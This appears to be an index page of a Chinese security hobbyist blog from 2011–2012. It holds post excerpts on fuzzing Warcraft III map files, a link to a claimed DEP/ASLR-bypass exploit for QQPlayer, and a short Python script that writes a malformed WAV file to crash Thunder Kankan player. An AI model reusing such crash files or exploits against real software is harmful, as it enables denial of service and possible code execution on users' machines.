2012

Posted on | 一月 15, 2012 | No Comments

Category: 其他

WAR3格式

Posted on | 十二月 12, 2011 | No Comments

本来是考虑w3g格式的
参见如下

http://w3g.deepnode.de/files/w3g_format.txt

大致包含部分：
版本头
压缩数据

解压出来包含各类时间，动作等。用的是ZLIB解压
/////////////////////////////////////////////////////////////////////////////////////////////////////
后来想了下，用录像不如用地图，随便打开一个

00000000h: 48 4D 33 57 00 00 00 00 E5 8F AA E6 98 AF E5 8F ; HM3W….鍙槸鍙

00000010h: A6 E5 A4 96 E4 B8 80 E5 BC A0 E9 AD 94 E5 85 BD ; ﹀涓€寮犻瓟鍏?

00000020h: E4 BA 89 E9 9C B8 49 49 49 E7 9A 84 E5 9C B0 E5 ; 浜夐湼III鐨勫湴?

00000030h: 9B BE 00 14 9C 00 00 01 00 00 00 00 00 00 00 00 ; 浘..?……….

00000040h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; …………….

00000200h: 4D 50 51 1A 20 00 00 00 12 34 56 78 11 11 11 11 ; MPQ. ….4Vx….

00000210h: A1 38 00 00 A1 3C 00 00 40 00 00 00 10 00 00 00 ; ?..?..@…….

00000220h: 24 00 00 00 8D 02 00 00 BF 04 00 00 FE 06 00 00 ; $…?..?..?..

00000230h: 25 09 00 00 54 0B 00 00 85 0D 00 00 93 0F 00 00 ; %…T…?..?..

猜测下包含文件头和MPQ2部分，我们随便修改下MPQ后面的数字，如上，1234567811111111，用WAR3打开，果然CRASH了哈，一次是内存不够，一次是异常。大胆猜测，直接读取值开辟空间？

Category: sec

QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS

Posted on | 十一月 21, 2011 | No Comments

http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/qqplayer.rb
样本：

http://115.com/file/cl3naedv

http://115.com/file/aqu3qzmk

# Exploit Title: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS # Date: 2011,11,21 # Author: hellok(warptencq[at]gmail.com) # Software Link: http://dl_dir.qq.com/invc/qqplayer/QQPlayer_Setup_32_845.exe # Version: 32_845(lastest) # Tested on: WIN7 Read more

Category: 其他

thunder_kankan_stack_overflow/dos exploit

Posted on | 十一月 17, 2011 | No Comments

http://cq-cser.cn/wp-content/plugins/downloads-manager/upload/kankan.py

print “”"

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

#0 ___ ___ ___ ___ ___ ___ 1

#1 /\__\ /\ \ /\__\ /\__\ /\ \ /\__\ 0

#0 /:/ / /::\ \ /:/ / /:/ / /::\ \ /:/ / 1

#1 /:/__/ /:/\:\ \ /:/ / /:/ / /:/\:\ \ /:/__/ 0

#0 /::\ \ ___ /::\~\:\ \ /:/ / /:/ / /:/ \:\ \ /::\__\____ 1

#1 /:/\:\ /\__\ /:/\:\ \:\__\ /:/__/ /:/__/ /:/__/ \:\__\ /:/\:::::\__\0

#0 \/__\:\/:/ / \:\~\:\ \/__/ \:\ \ \:\ \ \:\ \ /:/ / \/_|:|~~|~ 1

#1 \::/ / \:\ \:\__\ \:\ \ \:\ \ \:\ /:/ / |:| | 0

#0 /:/ / \:\ \/__/ \:\ \ \:\ \ \:\/:/ / |:| | 1

#1 /:/ / \:\__\ \:\__\ \:\__\ \::/ / |:| | 0

#0 \/__/ \/__/ \/__/ \/__/ \/__/ \|__| 1

#1 0

#0 [+] Exploit Title: Thunder kankan player Stack overflow/DOS Exploit 1

#1 [+] Software Link: dl.xunlei.com/xmp.html 0

#0 [+] Software: Thunder kankan player 1

#1 [+] Version : 4.8.3.840(last) 0

#0 [+] Tested On: WIN 7 1

#1 [+] Code by: hellok(warptencq@gmail.com) 0

#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-1

“”"

filepath = “exploit.wav”

f = open(filepath, “wb”)

file = ‘\x52\x49\x46\x46\x62\xb8\x20\x20\x57\x41\x56\x45\x66\x6d\x74\x20′

f.write(file)

f.close()

print “Done..”

Category: sec

Blogs, Feeds, Guides & Links[zz]

Posted on | 十一月 13, 2011 | No Comments

原文：http://g0tmi1k.blogspot.com/2011/11/blog-guides-links.html
顺便FK GFW
特别推荐http://j00ru.vexillium.org/?p=893此系列 Read more

Category: sec

记事

Posted on | 十一月 2, 2011 | No Comments

Category: sec

recent life

Posted on | 十月 25, 2011 | No Comments

Category: sec

darungrim

Posted on | 十月 15, 2011 | No Comments

DarunGrim is a binary diffing tool. DarunGrim is a free diffing tool which provides binary diffing functionality. Read more

Category: 其他

qtweb3.7.2

Posted on | 十月 5, 2011 | 2 Comments

Category: POC

samba4_smbclient_linux_winnt_share_file

Posted on | 九月 22, 2011 | 1 Comment

Category: linux/unix

Page 12 3 4 5 »...Last »

About

本博客采用创作共用版权协议,要求署名、非商业用途和保持一致. 转载本博客内容也遵循“署名-非商业用途-保持一致”的创作共用协议.

CQ-CSER

计算机爱好者

2012

WAR3格式

QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS

thunder_kankan_stack_overflow/dos exploit

Blogs, Feeds, Guides & Links[zz]

记事

recent life

darungrim

qtweb3.7.2

samba4_smbclient_linux_winnt_share_file

Archives

链接表

SUNSHINE

About

订阅

Search

Admin